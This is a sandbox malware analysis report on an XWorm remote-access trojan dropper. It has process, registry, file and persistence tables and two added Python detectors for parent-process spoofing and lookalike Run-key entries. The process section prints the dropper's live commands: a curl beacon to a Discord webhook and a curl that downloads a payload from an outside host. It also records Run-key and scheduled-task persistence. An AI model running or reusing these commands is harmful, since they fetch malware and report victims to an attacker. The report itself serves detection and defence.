Malware Analysis Report

2024-11-16 13:37

Sample ID 240530-djtbascb4x
Target VM_Dropper.exe
SHA256 de9ea4b92ab39c4ff711fb80136eb53553d8932620a1794e41354bb5fb4060bc
Tags
xworm discovery persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de9ea4b92ab39c4ff711fb80136eb53553d8932620a1794e41354bb5fb4060bc

Threat Level: Known bad

The file VM_Dropper.exe was found to be: Known bad.

Malicious Activity Summary

xworm discovery persistence rat trojan

Suspicious use of NtCreateProcessExOtherParentProcess

Xworm

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-30 03:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 03:02

Reported

2024-05-30 03:07

Platform

win7-20240508-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe

"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe

Network

N/A

Files

memory/1500-0-0x000000007440E000-0x000000007440F000-memory.dmp

memory/1500-1-0x0000000001070000-0x0000000001096000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 03:02

Reported

2024-05-30 03:08

Platform

win10v2004-20240226-en

Max time kernel

126s

Max time network

309s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5328 created 3296 N/A C:\Windows\system32\WerFault.exe C:\Windows\system32\taskmgr.exe

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3068 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5232 created 3296 N/A C:\Windows\System32\svchost.exe C:\Windows\system32\taskmgr.exe
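Both tables above record a process being created under a parent other than the caller. Two of the three rows are ordinary Windows Error Reporting behaviour: WerSvc (hosted in svchost.exe) and WerFault.exe deliberately re-parent under the faulting application, here taskmgr.exe (PID 3296). The row that matters is powershell.EXE (PID 3068) creating a process that reports winlogon.exe (PID 632) as its parent, which is classic PPID spoofing; together with the "Suspicious use of SetThreadContext" entry later in this run (PID 3068 setting the context of dllhost.exe, PID 3012), it reads as PowerShell spawning a suspended dllhost.exe under a spoofed parent and hollowing it. The following Python is an added example, not part of the report, showing the triage logic: it compares the real creator with the reported parent and only excuses the mismatch when the creator is a WER component and a fault record for the claimed parent exists nearby. It uses a simplified ETW-style record layout (for the Microsoft-Windows-Kernel-Process ProcessStart event the header's ProcessId is the calling process, while the ParentProcessID payload field is the parent the child will report; Sysmon Event ID 1 shows only the latter). The PIDs come from the report; the child PID 5400, the dllhost child PID assignment, and all timestamps are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List

# Sample input, constructed for this example in a simplified ETW shape.
# header_pid/header_image: the process that called the create-process API.
# ProcessID/ParentProcessID/ImageName: the payload fields of a ProcessStart event.
# PIDs 3296 (taskmgr), 632 (winlogon), 5328 (WerFault), 5232 (svchost),
# 3068 (powershell), 3012 (dllhost) and 4284 (VM_Dropper) are from the report;
# child PID 5400 and every timestamp are assumptions.
PROCESS_TABLE: Dict[int, str] = {
    632: r"C:\Windows\system32\winlogon.exe",
    3296: r"C:\Windows\system32\taskmgr.exe",
    4284: r"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe",
}
EVENTS: List[dict] = [
    {"ts": 9.5, "event": "ApplicationError", "FaultingPid": 3296},  # WER fault record for taskmgr
    {"ts": 10.0, "event": "ProcessStart", "header_pid": 5232,
     "header_image": r"C:\Windows\System32\svchost.exe",
     "ProcessID": 5328, "ParentProcessID": 3296, "ImageName": r"C:\Windows\system32\WerFault.exe"},
    {"ts": 12.0, "event": "ProcessStart", "header_pid": 5328,
     "header_image": r"C:\Windows\system32\WerFault.exe",
     "ProcessID": 5400, "ParentProcessID": 3296, "ImageName": r"C:\Windows\system32\WerFault.exe"},
    {"ts": 20.0, "event": "ProcessStart", "header_pid": 3068,
     "header_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE",
     "ProcessID": 3012, "ParentProcessID": 632, "ImageName": r"C:\Windows\System32\dllhost.exe"},
    {"ts": 30.0, "event": "ProcessStart", "header_pid": 4284,
     "header_image": PROCESS_TABLE[4284],
     "ProcessID": 5116, "ParentProcessID": 4284, "ImageName": r"C:\Windows\SysWOW64\cmd.exe"},
]

WER_CREATORS = {"svchost.exe", "werfault.exe"}  # WerSvc re-parents under the faulting app
SENSITIVE_PARENTS = {"winlogon.exe", "lsass.exe", "services.exe", "wininit.exe", "csrss.exe"}
WER_WINDOW = 30.0  # seconds allowed between the fault record and the re-parented start


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    child_pid: int
    child_image: str
    creator_pid: int
    creator_image: str
    claimed_parent_pid: int
    claimed_parent_image: str
    level: str


def find_ppid_spoofing(events: List[dict], process_table: Dict[int, str],
                       wer_window: float = WER_WINDOW) -> List[Finding]:
    """Flag ProcessStart events whose caller differs from the reported parent."""
    faults = [(e["FaultingPid"], e["ts"]) for e in events if e["event"] == "ApplicationError"]
    findings: List[Finding] = []
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["event"] != "ProcessStart" or e["header_pid"] == e["ParentProcessID"]:
            continue  # normal creation: caller and reported parent agree
        claimed = e["ParentProcessID"]
        claimed_image = process_table.get(claimed, "<unknown>")
        creator = basename(e["header_image"])
        # WER is only excused when it runs from System32 AND a fault for the claimed parent preceded it
        wer_like = (
            creator in WER_CREATORS
            and e["header_image"].lower().startswith(r"c:\windows\system32")
            and any(pid == claimed and 0 <= e["ts"] - t <= wer_window for pid, t in faults)
        )
        if wer_like:
            level = "expected-wer"
        elif basename(claimed_image) in SENSITIVE_PARENTS:
            level = "high"  # user-land interpreter hiding under a privileged system parent
        else:
            level = "medium"
        findings.append(Finding(e["ProcessID"], e["ImageName"], e["header_pid"],
                                e["header_image"], claimed, claimed_image, level))
    return findings


if __name__ == "__main__":
    for f in find_ppid_spoofing(EVENTS, PROCESS_TABLE):
        print(f"{f.level:12} {basename(f.creator_image)}({f.creator_pid}) -> "
              f"{basename(f.child_image)}({f.child_pid}) claims parent "
              f"{basename(f.claimed_parent_image)}({f.claimed_parent_pid})")
```

The correlation step is what keeps the rule usable: without it, every crash on the estate produces a WerFault "spoofing" alert, and an allow-list of WER images alone is easy to abuse by naming a dropper svchost.exe outside System32, which is why the path check is there too.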

Xworm

trojan rat xworm

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\yar.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\penisware.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\calc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yar = "C:\\Users\\Admin\\AppData\\Roaming\\yar.exe" C:\Users\Admin\yar.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penisware = "C:\\Users\\Admin\\AppData\\Local\\penisware.exe" C:\Users\Admin\penisware.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svvhost = "C:\\Users\\Admin\\AppData\\Roaming\\svvhost.exe" C:\Users\Admin\calc.exe N/A
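The three Run values above share the pattern that makes XWorm-style persistence detectable: the autostart target sits under the user's profile, the key is written by a freshly dropped binary in the profile root rather than by an installer, and one of the names (svvhost) is a one-character lookalike of svchost.exe, written by a dropper that itself borrows the name calc.exe. The following Python is an added example, not part of the sandbox report, that scores Sysmon Event ID 13-style registry records on those three signals. The first three records are the report's rows (with the SID from the table); the fourth, a OneDrive autostart, is a constructed benign control showing why the "under the user profile" signal alone should only ever rate a review, since many legitimate per-user installers live in AppData.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample input: the three "Set value (str)" rows from the report's Run-key table,
# plus one constructed benign OneDrive row as a control. Field names mirror
# Sysmon Event ID 13 (TargetObject / Details / Image) in simplified form.
SID = "S-1-5-21-3808065738-1666277613-1125846146-1000"
RUN = r"\REGISTRY\USER" + "\\" + SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
EVENTS = [
    {"TargetObject": RUN + r"\yar", "Details": r"C:\Users\Admin\AppData\Roaming\yar.exe",
     "Image": r"C:\Users\Admin\yar.exe"},
    {"TargetObject": RUN + r"\penisware", "Details": r"C:\Users\Admin\AppData\Local\penisware.exe",
     "Image": r"C:\Users\Admin\penisware.exe"},
    {"TargetObject": RUN + r"\svvhost", "Details": r"C:\Users\Admin\AppData\Roaming\svvhost.exe",
     "Image": r"C:\Users\Admin\calc.exe"},
    {"TargetObject": RUN + r"\OneDrive",  # constructed control, not from the report
     "Details": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
     "Image": r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe"},
]

# Stems malware likes to imitate. Short stems ("calc") make distance-1 matching
# noisy; a production rule keeps this list tight and allow-lists known installers.
SYSTEM_STEMS = {"svchost", "dllhost", "lsass", "csrss", "winlogon", "wininit", "conhost", "explorer", "calc"}
WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
USER_DIR = re.compile(r"^[a-z]:\\users\\", re.I)
# Profile root, Temp, Downloads or Public: where droppers land, where installers rarely run from
DROP_ZONE = re.compile(r"^[a-z]:\\users\\(?:public\\|[^\\]+\\(?:[^\\]+$|appdata\\local\\temp\\|downloads\\))", re.I)


def edit_distance(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def first_path(details: str) -> str:
    """Strip arguments from a Run value: quoted path, or first whitespace token."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:details.index('"', 1)]
    return details.split()[0]


def stem(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].rsplit(".", 1)[0]


def masquerades(name: str, path: Optional[str]) -> bool:
    s = name.lower()
    if s in SYSTEM_STEMS:  # right name, wrong directory
        return path is None or not WINDOWS_DIR.match(path)
    return any(edit_distance(s, t) == 1 for t in SYSTEM_STEMS)  # svvhost, sachost, ...


@dataclass
class Verdict:
    value_name: str
    score: int
    level: str
    reasons: List[str] = field(default_factory=list)


def triage_run_key(ev: dict) -> Verdict:
    name = ev["TargetObject"].rsplit("\\", 1)[-1]
    target = first_path(ev["Details"])
    writer = ev["Image"]
    score, reasons = 0, []
    if USER_DIR.match(target) and not WINDOWS_DIR.match(target):
        score += 1
        reasons.append("autostart target lives under the user profile")
    if DROP_ZONE.match(writer):
        score += 1
        reasons.append("key written by a binary in profile root / Temp / Downloads")
    if masquerades(name, None) or masquerades(stem(target), target) or masquerades(stem(writer), writer):
        score += 2
        reasons.append("name imitates a Windows system binary")
    level = "alert" if score >= 2 else "review" if score == 1 else "ok"
    return Verdict(name, score, level, reasons)


def triage_all(events: List[dict]) -> dict:
    return {v.value_name: v for v in map(triage_run_key, events)}


if __name__ == "__main__":
    for v in triage_all(EVENTS).values():
        print(f"{v.level:6} {v.score} {v.value_name:10} {'; '.join(v.reasons)}")
```

The same lookalike check applies to the other dropped binaries in this run (sachost.exe is one edit from svchost.exe), and the "File created ...\config\systemprofile\AppData\Roaming\svvhost.exe" rows further down show the same names being staged under the SYSTEM profile as well, so the rule is worth running over HKLM Run keys and the systemprofile tree, not just HKU.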

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe C:\Users\Admin\penisware.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf C:\Users\Admin\sachost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe C:\Users\Admin\calc.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe C:\Users\Admin\yar.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3068 set thread context of 3012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\penisballs.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\yar.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\calc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\penisware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Users\Admin\penisballs.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\penisware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\penisware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\yar.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Users\Admin\penisballs.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\calc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\penisware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
